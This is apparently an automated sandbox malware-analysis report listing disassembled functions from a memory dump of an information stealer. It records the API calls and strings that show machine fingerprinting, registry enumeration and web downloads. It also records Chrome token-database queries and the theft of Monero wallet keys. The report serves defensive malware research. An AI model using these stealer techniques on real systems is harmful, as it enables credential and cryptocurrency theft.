GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Strings

:\, xrefs: 00410A06
4vA, xrefs: 00410B21
C, xrefs: 004109DF
QuBi, xrefs: 00410A27

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: 4vA$:\$C$QuBi
API String ID: 1856320939-3136354017
Opcode ID: 833c25be26e4abf268678450b1b1c96e363dde66ee4b2aa62ba4b55d3c2836db
Instruction ID: afb532c725d770de3e067a8038f5dd00e2c1259f512eb906fe001a9ab0ce8123
Opcode Fuzzy Hash: 833c25be26e4abf268678450b1b1c96e363dde66ee4b2aa62ba4b55d3c2836db
Instruction Fuzzy Hash: 4A417DB1A002289FCB259B799D85ADEBAB9EF1D304F0000EAB149E3161DA748F958F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,00436702,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,?,?,?,?,00436E8C), ref: 004113DC

Strings

?, xrefs: 00411263
- , xrefs: 004113E6
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: a21440866cc0b6c973b62b6df7128a953f588334f27f266d6584ea90b0506ff0
Instruction ID: 95c0a88fbcf90ef135dd83fe137fd1e062ecbfb5fe4e6f978c123641cde5aa55
Opcode Fuzzy Hash: a21440866cc0b6c973b62b6df7128a953f588334f27f266d6584ea90b0506ff0
Instruction Fuzzy Hash: 6561E77590022CAFEB21DB15DD84EDABBB9EB44704F1042E6A608A3161DF74AEC9CF54

Function 00416690 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 004166E4
lstrlenA.KERNEL32(?), ref: 004166EF

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004166FB,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 00416704
lstrlenA.KERNEL32(?), ref: 00416713
lstrlenA.KERNEL32(00000000), ref: 0041672C

Strings

ERROR, xrefs: 0041674F
ERROR, xrefs: 00416748
ERROR, xrefs: 004166DE
ERROR, xrefs: 00416741
ERROR, xrefs: 00416737

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: 44f9efb2bbabf387b58c7c975058e3ddce9aa287db1fd878ab68044c1a588d13
Instruction ID: dc9c4706f2650d158f0fefb2e1a2ff7b377827aec9e05abaa16ce52239cfc2ff
Opcode Fuzzy Hash: 44f9efb2bbabf387b58c7c975058e3ddce9aa287db1fd878ab68044c1a588d13
Instruction Fuzzy Hash: 7321B031A00255ABCB21BB75DC8AADD7BA5AF04308F12406BFD10F3191DB7CDD858B99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040EB71
firefox, xrefs: 0040EE17
Stable\, xrefs: 0040ED5B

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: a11cdc23d632ad87d2d668c7047665916c5765af9ffa6adc542b31f642fa8a67
Instruction ID: 7a2a94bb1f910f2ee0fb8169b5e8af27d31078e15f1b43aa1f70c0025d60d998
Opcode Fuzzy Hash: a11cdc23d632ad87d2d668c7047665916c5765af9ffa6adc542b31f642fa8a67
Instruction Fuzzy Hash: A1B1AF72D00209AFCF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA588BD9

Function 004067ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: a405f7ff97a1e54891f2ef86d7cd8d09453614d756a4831b7d556913e0c5e857
Instruction ID: 499390dc501f87d9a0f092723393b122be0f39da40e36716acbc4d4650be8673
Opcode Fuzzy Hash: a405f7ff97a1e54891f2ef86d7cd8d09453614d756a4831b7d556913e0c5e857
Instruction Fuzzy Hash: A9413EB190022CAFDB209B21DD49BDA7BB9EB44715F1040B6BB09B3191DB349E95CF98

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: ce9b4030f061e4cf16ab004430b602578042c1dceaaa91d43213b611094755c3
Instruction ID: aa50279fba39880fafd94cc49e2dc93f8dd15cb26d87b376143ff4ee08d0e260
Opcode Fuzzy Hash: ce9b4030f061e4cf16ab004430b602578042c1dceaaa91d43213b611094755c3
Instruction Fuzzy Hash: C05190B1D0022C9FDB309F54DC85BDDB7B9AB44308F0000FAA609B7692D6796E898F59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: 9ff920a548a0b5548298c1ab44bc272efec62b0925492279d5febe922ad64b7c
Instruction ID: c94f523ff7bad73469f89451568cb3d098cfda1876d591561d3125418b52d6d2
Opcode Fuzzy Hash: 9ff920a548a0b5548298c1ab44bc272efec62b0925492279d5febe922ad64b7c
Instruction Fuzzy Hash: 86115B70900204EFDF219FA4DD88EAE7FB9EB48781F20016AF581B3290DB759A85DB15

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,004166FB,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Strings

SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F
AccountId, xrefs: 00409BC9
GoogleAccounts, xrefs: 00409A37
GoogleAccounts, xrefs: 00409A8E

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: ce8ec058c05e2601c67cad266ea9257c57878fa42074de4da3d4e9a96b7a5179
Instruction ID: 42ccd241d6f059b593bfcd686271c518f3452b4c25f2236aba29873534d4d964
Opcode Fuzzy Hash: ce8ec058c05e2601c67cad266ea9257c57878fa42074de4da3d4e9a96b7a5179
Instruction Fuzzy Hash: 9B813F71E00209AFCF11FBA5DE469DD7775AF04309F510026F900B71E2DBB8AE898B98

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00416FB0,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,00416FCE,00436C18,00000000,004366AE,?,?,?,?,0041848C), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,004366D6,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004174FD,004366B7), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417535), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416DAB: CreateThread.KERNEL32(00000000,00000000,00416CDA,?,00000000,00000000), ref: 00416E4A
Part of subcall function 00416DAB: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416E52

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A9B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B5C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000B6E000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$File$AllocCreateHeaplstrlen$CloseHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 3529164666-3586502688
Opcode ID: 42c69a33bcf20dd1deda1bee6ffd1c5e2c07e9178fe9e556e230e05839f84914
Instruction ID: 5a0d5eb71206d45da3d16abd71f7687eff367565b5614c5da3d6b9e3a7d279c7
Opcode Fuzzy Hash: 42c69a33bcf20dd1deda1bee6ffd1c5e2c07e9178fe9e556e230e05839f84914
Instruction Fuzzy Hash: 41512EB1E5022D9BCF11EB65DD466DC7779AF04308F4044BAB60873191DA78AFC98E58

Function 00415BC1 Relevance: 10.6, APIs: 7, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415C50

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415C6D
lstrcatA.KERNEL32(?,?), ref: 00415C8C
lstrcatA.KERNEL32(?,?), ref: 00415CA0
lstrcatA.KERNEL32(?), ref: 00415CB3
lstrcatA.KERNEL32(?,?), ref: 00415CC7
lstrcatA.KERNEL32(?), ref: 00415CDA

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,00416F8F,004366AE,?,?,?,?,0041848C), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 004158D5: GetProcessHeap.KERNEL32(00000000,7.06510669 16.9258959c5.22739451-2.1065178 8.71314291-3.4952633 10.45724521-4.1662364 4.9797665-1.9157646 6.0145193-2.2485535 6.6889567-2.2595423.1483363-.0024169.480005.0315855.6948461.192827.1814076.1361492.23132.3200675.2552048.4491519.0238847.1290844.05362,?,?,?), ref: 004158FA
Part of subcall function 004158D5: HeapAlloc.KERNEL32(00000000), ref: 00415901
Part of subcall function 004158D5: wsprintfA.USER32 ref: 0041591A
Part of subcall function 004158D5: FindFirstFileA.KERNEL32(?,?), ref: 00415931
Part of subcall function 004158D5: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415952
Part of subcall function 004158D5: StrCmpCA.SHLWAPI(?,00436A9C), ref: 0041596C
Part of subcall function 004158D5: wsprintfA.USER32 ref: 00415993

Memory Dump Source

Source File: 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2710203161.0000000000980000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009BF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009C4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.00000000009E3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2710203161.0000000000A02000.00000040.00000400.00020000.00000000.sdmpDownload File
